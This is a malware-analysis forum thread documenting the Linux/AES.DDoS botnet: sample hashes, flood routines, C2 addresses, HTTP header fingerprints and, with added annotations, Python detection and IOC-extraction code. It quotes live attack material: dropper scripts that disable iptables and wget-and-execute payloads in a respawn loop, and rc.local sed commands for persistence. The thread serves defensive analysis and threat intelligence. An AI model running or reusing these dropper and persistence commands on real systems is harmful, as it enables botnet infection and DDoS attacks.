A forum for reverse engineering, OS internals and malware analysis 
#24054 by unixfreaxjp, Sun Oct 05, 2014 11:16 am
Same source provides this 4MB+ flooder (AES.DDoS full version): https://www.virustotal.com/en/file/fdde ... 412505809/
[image]
Attack from a China address was recorded well. PoC of cyber crime:
[image]
AES cipher PoC:
AES::AES(uchar *)
AES::~AES(void)
AES::Cipher(uchar *)
AES::InvCipher(uchar *)
AES::Cipher(void *,int)
AES::InvCipher(void *,int)
AES::KeyExpansion(uchar *,uchar *[3][3])
AES::FFmul(uchar,uchar)
AES::SubBytes(uchar *[3])
AES::ShiftRows(uchar *[3])
AES::MixColumns(uchar *[3])
AES::AddRoundKey(uchar *[3],uchar *[3])
AES::InvSubBytes(uchar *[3])
AES::InvShiftRows(uchar *[3])
AES::InvMixColumns(uchar *[3])
Flooder:
DNS_Flood1(void *)
DNS_Flood2(void *)
DNS_Flood3(void *)
DNS_Flood4(void *)
SYN_Flood(void *) 
LSYN_Flood(void *)
UDP_Flood(void *) 
UDPS_Flood(void *)
TCP_Flood(void *) 
CC_Flood(void *)  
CC2_Flood(void *) 
CC3_Flood(void *)

2 user-agent patterns:
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
HTTP/1.1

User-Agent:Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)
Accept: text/html, */*
HTTP/1.1
Daemon startup is NOT xinetd but rc.local based:
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '/%s/d' /etc/rc.local
CNC (IP based):
222.186.34.152:48080
ASN: 23650 | 222.186.34.0/23 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
thx @wirehack7
Attachments: 7z/infected (303.42 KiB)
#24055 by unixfreaxjp, Sun Oct 05, 2014 11:46 am
[image]
https://www.virustotal.com/en/file/42fe ... 412509775/
https://www.virustotal.com/en/file/dfe4 ... 412509784/
↑ As shown in the filenames, MIPS and ARM versions of the Linux/AES.DDoS variant.
This version for ARM/MIPS only has the TCP, CC, CC2 and CC3 attack variations.
The download hits were incredibly high despite the fact it was just uploaded (a warning!).

Attack logs from an IP in China:
Image
CNC is IP based, the same as http://www.kernelmode.info/forum/viewto ... =10#p24054 or http://www.kernelmode.info/forum/viewto ... 483#p24053:
222.186.34.152 | 23650 | 222.186.34.0/23 | CHINANET-JS-AS | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
Noted these installations for autostart:
sed -i -e '/$/d' /etc/rc.local
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local
Thx wireshark for samples | #MMD!
Attachments: 7z/infected (641.85 KiB)
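The six `sed` lines quoted in posts #24054 and #24055 (and repeated unchanged in #24067) are the whole persistence mechanism: strip the trailing `exit` line from `/etc/rc.local`, remove any earlier copy of the malware's own line, then insert `<dir>/<binary>` (or `<dir>/<binary> start` for `rc.d/rc.local` and `init.d/boot.local`) as line 2. The following is an added example for responders, not code from the thread, from MMD or from the malware: it models those steps on a constructed stock `rc.local` so you can see exactly what the file looks like afterwards, and gives a triage check that flags the two leftovers (no `exit 0`, a bare absolute path executed at line 2). The payload path `/tmp/xcc1` is a hypothetical value; the literal address `/$/` in the post matches every line of a file, and since the page does not show what, if anything, the binary substitutes there, that step is deliberately not modelled.

```python
"""Model and detect the rc.local autostart trick used by Linux/AES.DDoS.

Added example, not code from the kernelmode thread or from the malware.
Strings the dropper uses (quoted from posts #24054 / #24055):
    sed -i -e '/exit/d' /etc/rc.local
    sed -i -e '/%s/d'   /etc/rc.local
    sed -i -e '2 i%s/%s' /etc/rc.local
    sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
    sed -i -e '2 i%s/%s start' /etc/init.d/boot.local
"""
import re

# A bare absolute path, optionally followed by 'start', as the whole line: the shape
# the dropper inserts at line 2 (e.g. '/tmp/xcc1' or '/tmp/xcc1 start').
BARE_EXEC = re.compile(r"^\s*(/\S+)(?:\s+start)?\s*$")

# Constructed sample of a stock rc.local (hypothetical content, not from the page).
CLEAN_RC_LOCAL = (
    "#!/bin/sh -e\n"
    "# rc.local: run at the end of the multi-user boot\n"
    "touch /var/lock/subsys/local\n"
    "exit 0\n"
)


def apply_persistence(text: str, payload: str, suffix: str = "") -> str:
    """Return `text` as the dropper's sed commands would leave it.

    payload: the '%s/%s' path the malware writes (assumed here, e.g. '/tmp/xcc1')
    suffix:  '' for /etc/rc.local, ' start' for rc.d/rc.local and boot.local
    """
    lines = text.splitlines()
    lines = [l for l in lines if "exit" not in l]      # sed '/exit/d' (any line containing 'exit')
    lines = [l for l in lines if payload not in l]     # sed '/%s/d'   (drop an older copy of itself)
    if len(lines) >= 2:                                 # sed '2 i...' only fires if a line 2 exists
        lines.insert(1, payload + suffix)
    return "\n".join(lines) + "\n"


def check_rc_local(text: str) -> dict:
    """Triage one boot script and report what the dropper leaves behind."""
    lines = text.splitlines()
    has_exit = any(re.match(r"^\s*exit\b", l) for l in lines)
    bare = [(n, BARE_EXEC.match(l).group(1))
            for n, l in enumerate(lines, 1) if BARE_EXEC.match(l)]
    line2 = any(n == 2 for n, _ in bare)
    return {
        "exit_missing": not has_exit,      # '/exit/d' removed the trailing 'exit 0'
        "bare_exec_lines": bare,           # (line number, path) candidates to inspect
        "line2_injected": line2,           # the dropper always inserts at line 2
        "suspicious": (not has_exit) and line2,
    }


def demo() -> dict:
    """Infect the constructed rc.local with the hypothetical payload and triage it."""
    infected = apply_persistence(CLEAN_RC_LOCAL, "/tmp/xcc1")
    return check_rc_local(infected)


if __name__ == "__main__":
    print(apply_persistence(CLEAN_RC_LOCAL, "/tmp/xcc1"))
    print(demo())
```

On a live box the same check applies to `/etc/rc.d/rc.local` and `/etc/init.d/boot.local`, where the injected line carries the ` start` suffix; `check_rc_local` reports the path without the suffix so the three files can be compared directly.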
#24067 by unixfreaxjp, Tue Oct 07, 2014 12:53 am
MIPS version of AES.DDoS from different sources, worth writing a bit about:
https://www.virustotal.com/en/file/74f9 ... 412642201/
https://www.virustotal.com/en/file/9550 ... 412644091/
Compiled with:
GCC: (Sourcery CodeBench 2014.05-6) 4.8.3 20140320 (prerelease)
With sources:
 AES.cpp
 main.cpp
Autostart install:
sed -i -e '/exit/d' /etc/rc.local
sed -i -e '/$/d' /etc/rc.local
sed -i -e '/%s/d' /etc/rc.local
sed -i -e '2 i%s/%s' /etc/rc.local
sed -i -e '2 i%s/%s start' /etc/rc.d/rc.local
sed -i -e '2 i%s/%s start' /etc/init.d/boot.local
Typical:
Unknown
VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%s
Hacker
VERSONEX:Linux-%s-mips|%d|%d MHz|%dMB|%dMB|%s
AES:
J^X3AES
AES.cpp
_ZN3AESC2EPh
_ZN3AES9InvCipherEPvi
_ZN3AESD2Ev
_ZN3AESC1EPh
_ZTI3AES
_ZN3AES11InvSubBytesEPA4_h
_ZN3AES5FFmulEhh
_ZN3AES13InvMixColumnsEPA4_h
_ZN3AES8SubBytesEPA4_h
_ZN3AESD1Ev
_ZN3AES10MixColumnsEPA4_h
_ZN3AES9ShiftRowsEPA4_h
_ZN3AES12InvShiftRowsEPA4_h
_ZN3AESD0Ev
_ZTV3AES
_ZN3AES9InvCipherEPh
_ZN3AES11AddRoundKeyEPA4_hS1_
_ZN3AES6CipherEPvi
_ZN3AES12KeyExpansionEPhPA4_A4_h
_ZTS3AES
_ZN3AES6CipherEPh
HTTP headers used:
// method:
GET 
 HTTP/1.1
// pattern #1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host:
Connection: Keep-Alive
// pattern #2:
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: 
Connection: Keep-Alive
Pragma: no-cache
CNC (IP based):
218.244.148.150||37963 | 218.244.128.0/19 | CNNIC-ALIBABA-CN-NET | CN | - | HICHINA TELECOM NET
Attachments: 7z/infected (351.68 KiB)
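Two of the strings above are directly usable as network fingerprints: the check-in format `VERSONEX:Linux-%s|%d|%d MHz|%dMB|%dMB|%s` (with `Linux-%s-mips|...` on the MIPS build) and the HTTP header patterns the CC floods send, which combine with the two user-agents quoted in post #24054. The following is an added example, not code from the thread or from the malware: a parser for the VERSONEX beacon and a matcher that names which of the three quoted user-agent/header patterns a captured request follows. The page only gives the printf format, not the meaning of the numeric fields, so the parser names them generically (`n1`, `mhz`, `mb1`, `mb2`); the sample beacon and request below are constructed, not captured.

```python
"""Network-side fingerprints for Linux/AES.DDoS traffic.

Added example; not the thread's tooling and not malware code. Field names in
parse_versonex() are generic because the page only shows the format string.
"""
import re

# VERSONEX:Linux-<tag>|<int>|<int> MHz|<int>MB|<int>MB|<string>
VERSONEX = re.compile(
    rb"^VERSONEX:Linux-(?P<tag>[^|]*)\|(?P<n1>\d+)\|(?P<mhz>\d+) MHz\|"
    rb"(?P<mb1>\d+)MB\|(?P<mb2>\d+)MB\|(?P<tail>.*)$"
)

# Exact User-Agent values quoted in the thread, keyed by the post they came from.
FLOOD_USER_AGENTS = {
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)": "p24054-ua1",
    "Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.0; MyIE 3.01)": "p24054-ua2",
    "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)": "p24067-ua",
}

# Constructed samples (hypothetical values; the beacon uses the MIPS tag form).
SAMPLE_BEACON = b"VERSONEX:Linux-2.6.32-mips|1|400 MHz|64MB|32MB|1.0\n"
SAMPLE_FLOOD = (
    b"GET / HTTP/1.1\r\n"
    b"Accept: text/html, application/xhtml+xml, */*\r\n"
    b"Accept-Language: zh-CN\r\n"
    b"User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"Host: target.example\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\n\r\n"
)


def parse_versonex(payload: bytes):
    """Return the check-in fields as a dict, or None if this is not a VERSONEX beacon."""
    m = VERSONEX.match(payload.rstrip(b"\r\n\x00"))
    if not m:
        return None
    tag = m.group("tag").decode("latin-1")
    return {
        "tag": tag,
        "arch": "mips" if tag.endswith("-mips") else "unknown",  # only the MIPS build tags itself
        "n1": int(m.group("n1")),
        "mhz": int(m.group("mhz")),
        "mb1": int(m.group("mb1")),
        "mb2": int(m.group("mb2")),
        "tail": m.group("tail").decode("latin-1"),
    }


def parse_http_request(raw: bytes):
    """Split a request into (method, target, version, headers) with lower-cased names.

    Tolerates the missing space after 'User-Agent:' seen in post #24054.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split()
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], parts[2], headers


def fingerprint_flood(raw: bytes):
    """Name the AES.DDoS CC-flood pattern a request matches, or None."""
    parsed = parse_http_request(raw)
    if not parsed:
        return None
    method, _, version, headers = parsed
    if method != "GET" or version != "HTTP/1.1":
        return None
    label = FLOOD_USER_AGENTS.get(headers.get("user-agent", ""))
    if label is None:
        return None
    # Both #24067 patterns also carry Accept-Language: zh-cn / zh-CN.
    if label == "p24067-ua" and headers.get("accept-language", "").lower() != "zh-cn":
        return None
    return label


if __name__ == "__main__":
    print(parse_versonex(SAMPLE_BEACON))
    print(fingerprint_flood(SAMPLE_FLOOD))
```

The user-agent match is exact on purpose: all three strings are old, fixed values that real browsers no longer send, so an exact hit on a high-rate stream of `GET` requests is a much stronger signal than any substring match, and the `zh-cn` check removes the one case where an unrelated client could still collide.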
#24112 by unixfreaxjp, Thu Oct 09, 2014 1:35 pm
These samples are obviously aiming at routers, see the "WRT" used as the file name:
[image]
thanks benkow for attack report
https://www.virustotal.com/en/file/d10b ... 412861105/
https://www.virustotal.com/en/file/fa2c ... 412861136/
https://www.virustotal.com/en/file/c702 ... 412861169/
CNC:
124.173.118.167
Loc: 124.173.118.167||4134 | 124.172.0.0/15 | CHINANET | CN | SZGWBN.NET.CN | WORLD CROSSING TELECOM (GUANGZHOU) LTD.
Attachments: 7z/infected (941.24 KiB)
#24196 by unixfreaxjp, Thu Oct 23, 2014 2:35 pm
New one (uploaded 3 days ago with 20+ hits) for x32, with details unchanged from: http://www.kernelmode.info/forum/viewto ... 483#p23869
Weaponized with the flood function as per: http://www.kernelmode.info/forum/viewto ... 483#p23959
Panel:
[image]
VT: https://www.virustotal.com/en/file/da1e ... 414072434/
CNC PoC:
connect(1, {sa_family=AF_INET, sin_port=htons(48080), sin_addr=inet_addr("116.255.162.80")}, 16
TCP mmdbangsjerks.malwaremustdie.org:52434->116.255.162.80:48080 (ESTABLISHED)
Connection to 116.255.162.80 48080 port [tcp/*] succeeded!
^C
$ date
Thu Oct 23 23:34:00 JST 2014
CNC location:
116.255.162.80||37943 | 116.255.128.0/17 | CNNIC | CN | - | ZHENGZHOU GIANT COMPUTER NETWORK TECHNOLOGY CO. LTD
Attachments: 7z/infected (639.38 KiB)
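The CNC PoC above is the usual trio of evidence for an ELF sample run in a sandbox: the `connect()` call from `strace`, the established socket from `lsof`/`netstat`, and an `nc -v` confirmation that the port answers. When a panel drops several dozen samples at once (as in the next posts), pulling the endpoints out of those logs by hand is error-prone, so here is an added example, not the thread's own tooling, that recognises the three line shapes quoted in posts #24054, #24196 and #24216 and turns the endpoints into egress-block rules. The sample log is assembled from lines quoted on the page; the `iptables ... OUTPUT ... DROP` rule shape is an assumed containment step, not something the posts describe.

```python
"""Extract C2 endpoints from strace / lsof / nc evidence and emit block rules.

Added example (not code from the thread). Recognised line shapes, all quoted
in the thread:
  strace : connect(1, {sa_family=AF_INET, sin_port=htons(48080), sin_addr=inet_addr("116.255.162.80")}, 16
  lsof   : TCP host:52434->116.255.162.80:48080 (ESTABLISHED)
  nc -v  : Connection to 116.255.162.80 48080 port [tcp/*] succeeded!
"""
import re

# (port, ip) order differs between the strace line and the other two.
STRACE_CONNECT = re.compile(r'sin_port=htons\((\d+)\), sin_addr=inet_addr\("([\d.]+)"\)')
ESTABLISHED = re.compile(r"TCP \S+->([\d.]+):(\d+) \(ESTABLISHED\)")
NC_SUCCEEDED = re.compile(r"Connection to ([\d.]+) (\d+) port")

# Sample log built from lines quoted in posts #24196 and #24216.
SAMPLE_LOG = """\
connect(1, {sa_family=AF_INET, sin_port=htons(48080), sin_addr=inet_addr("116.255.162.80")}, 16
TCP mmdbangsjerks.malwaremustdie.org:52434->116.255.162.80:48080 (ESTABLISHED)
Connection to 116.255.162.80 48080 port [tcp/*] succeeded!
Cracked: sa_family=AF_INET, sin_port=htons(48080), sin_addr=inet_addr("104.194.25.172")
PoC: TCP ifuckddos.malwaremustdie.org:43063->104.194.25.172:48080 (ESTABLISHED)
"""


def extract_c2(log: str) -> set:
    """Return the set of (ip, port) endpoints the log shows the sample talking to."""
    found = set()
    for line in log.splitlines():
        m = STRACE_CONNECT.search(line)
        if m:
            found.add((m.group(2), int(m.group(1))))
            continue
        for pat in (ESTABLISHED, NC_SUCCEEDED):
            m = pat.search(line)
            if m:
                found.add((m.group(1), int(m.group(2))))
                break
    return found


def block_rules(endpoints) -> list:
    """One egress DROP rule per (ip, port), in a stable order (assumed containment shape)."""
    return [f"iptables -A OUTPUT -p tcp -d {ip} --dport {port} -j DROP"
            for ip, port in sorted(endpoints)]


def ports_by_count(endpoints) -> dict:
    """How many distinct C2 hosts use each port; the thread's samples all use 48080."""
    counts = {}
    for _, port in endpoints:
        counts[port] = counts.get(port, 0) + 1
    return counts


if __name__ == "__main__":
    eps = extract_c2(SAMPLE_LOG)
    print(sorted(eps))
    print("\n".join(block_rules(eps)))
    print(ports_by_count(eps))
```

Deduplication matters here: the same endpoint shows up three times in three formats for one sample, and a rule set that repeats it three times is harder to audit than one that lists it once.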
#24213 by unixfreaxjp, Sat Oct 25, 2014 8:50 am
A serious amount of infection scripts and ELF malware spotted in a panel.
[image]
The scripts were used to disarm the firewall and to cascade-download & execute ALL of the ELF AES.DDoS malware served in this panel, snips:
#!/bin/bash
iptables -F 
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/xcc*
cd /tmp/;wget http://xxxxx/xcc1;chmod a+x xcc1;./xcc1
if [ $? -eq 0 ];then

else
  
while true

do
    ps | grep xcc* | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 60
   else 
    cd /tmp/;wget http://xxxxx/xcc1;chmod a+x xcc1;./xcc1
   fi
    ps | grep script.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 60
   else
cd /tmp;wget http://xxxxx/script.sh ; chmod a+x script.sh;./script.sh
   fi 
done
and..
#!/bin/bash
iptables -F 
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/xcc*
while true

do
    ps | grep xcc* | grep -v grep 
    if [ $? -eq 0 ];then
         sleep 60
   else 
    cd /tmp/;wget http://xxxxx/xcc2;chmod a+x xcc2;./xcc2
   fi
    ps | grep script1.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 60
   else
cd /tmp;wget http://xxxxx/script1.sh ; chmod a+x script1.sh;sh script1.sh
   fi 
done
..and so on..
Samples are below; they lead to multiple CNCs as written in VT:
https://www.virustotal.com/en/file/8468 ... 414221880/
https://www.virustotal.com/en/file/e5f4 ... 414225695/
https://www.virustotal.com/en/file/da1e ... 414225854/
https://www.virustotal.com/en/file/575f ... 414226374/
Reported credit: wirehack7
DISCLAIMER:
This is the MalwareMustDie ELF team's work, posted ONLY in kernelmode as a repository; it is shared with the community, don't use this information for publication without mentioning MMD or KM.
All of the data is bound to: http://blog.malwaremustdie.org/p/the-ru ... es-we.html
Attachments: 7z/infected (1.77 MiB)
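Both snippets above follow one template: flush and disable iptables, wipe `/tmp/xcc*`, fetch and run the ELF, then loop forever re-fetching the ELF and the script itself whenever `ps | grep` no longer sees them. Since a panel like this serves many such scripts that differ only in the file names, here is an added example, not the thread's own tooling, of a parser that reads the script text (never executes it) and reports the IOCs a responder wants: download URLs, dropped file names, working directory, what gets executed, which process names the watchdog loop checks, and the firewall-tampering lines. `SAMPLE_SCRIPT` is a constructed condensation of the first snippet on the page, with the `xxxxx` host placeholder kept exactly as the post shows it.

```python
"""IOC extraction from AES.DDoS dropper scripts of the kind quoted in post #24213.

Added example (not the thread's tooling). Parses only; nothing is run.
"""
import re

# Constructed from the first snippet on the page; 'xxxxx' is the post's own placeholder.
SAMPLE_SCRIPT = """\
#!/bin/bash
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
rm -f /tmp/xcc*
cd /tmp/;wget http://xxxxx/xcc1;chmod a+x xcc1;./xcc1
while true
do
    ps | grep xcc* | grep -v grep
    if [ $? -eq 0 ];then
         sleep 60
   else
    cd /tmp/;wget http://xxxxx/xcc1;chmod a+x xcc1;./xcc1
   fi
    ps | grep script.sh | grep -v grep
    if [ $? -eq 0 ];then
         sleep 60
   else
cd /tmp;wget http://xxxxx/script.sh ; chmod a+x script.sh;./script.sh
   fi
done
"""

FIREWALL_TAMPER = re.compile(
    r"^\s*(iptables\s|/etc/init\.d/iptables\s|chkconfig\s+iptables\b|service\s+iptables\b)"
)
WGET_URL = re.compile(r"\bwget\s+([^\s;]+)")          # stop at ';' (the scripts chain with ';')
WATCHDOG = re.compile(r"ps\s*\|\s*grep\s+(\S+)")       # what the respawn loop looks for
WORKDIR = re.compile(r"\bcd\s+(/\S*?)\s*;")            # 'cd /tmp/;' and 'cd /tmp;'
EXEC = re.compile(r"(?:^|;|\s)(?:\./|sh\s+)(\S+)")     # './xcc1' or 'sh script1.sh'


def parse_dropper(script: str) -> dict:
    """Return the indicators found in one dropper script."""
    lines = script.splitlines()
    urls = sorted({u for line in lines for u in WGET_URL.findall(line)})
    return {
        "firewall_tamper": [l.strip() for l in lines if FIREWALL_TAMPER.match(l)],
        "urls": urls,
        "dropped_files": sorted({u.rsplit("/", 1)[-1] for u in urls}),
        "workdirs": sorted({d.rstrip("/") or "/" for line in lines for d in WORKDIR.findall(line)}),
        "executed": sorted({e for line in lines for e in EXEC.findall(line)}),
        "watchdog_targets": sorted({w for line in lines for w in WATCHDOG.findall(line)}),
        # 'while true' plus a sleep between checks is the respawn loop both snippets share.
        "respawn_loop": any(l.strip() == "while true" for l in lines)
                        and any(l.strip().startswith("sleep") for l in lines),
    }


if __name__ == "__main__":
    for key, value in parse_dropper(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

The watchdog targets are the useful part for cleanup: the loop only checks `ps` for the names `xcc*` and `script.sh`, so killing the ELF alone brings it straight back within 60 seconds; the script process (and any cron or rc.local entry that restarts the script) has to go first.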
#24216 by unixfreaxjp, Sat Oct 25, 2014 2:52 pm
A new and big deal of payloads, isn't it? ↓ (thx: shibumi)
All of these are AES.DDoS compiled for multiple architectures: Intel, MIPS & ARM.
[image]
The xx ones are a copy of the "other" types, so only 5 unique samples:
https://www.virustotal.com/en/file/0df5 ... 414244976/
https://www.virustotal.com/en/file/d6a8 ... 414245012/
https://www.virustotal.com/en/file/d9cf ... 414245153/
https://www.virustotal.com/en/file/52e8 ... 414245179/
https://www.virustotal.com/en/file/86c0 ... 414245203/
As reversed, these ELFs will fire up DDoS as soon as executed; you cannot stop it (easily), so don't do that.
CNCs are the same, and all lead to a United States of America network :o
Cracked: sa_family=AF_INET, sin_port=htons(48080), sin_addr=inet_addr("104.194.25.172")
PoC: TCP ifuckddos.malwaremustdie.org:43063->104.194.25.172:48080 (ESTABLISHED)
104.194.25.172||36114 | 104.194.0.0/19 | VERSAWEB-ASN | US | VERSAWEB.COM | VERSAWEB LLC
The detection ratio is very good, thank you for paying attention folks!
Attachments: 7z/infected (1.76 MiB)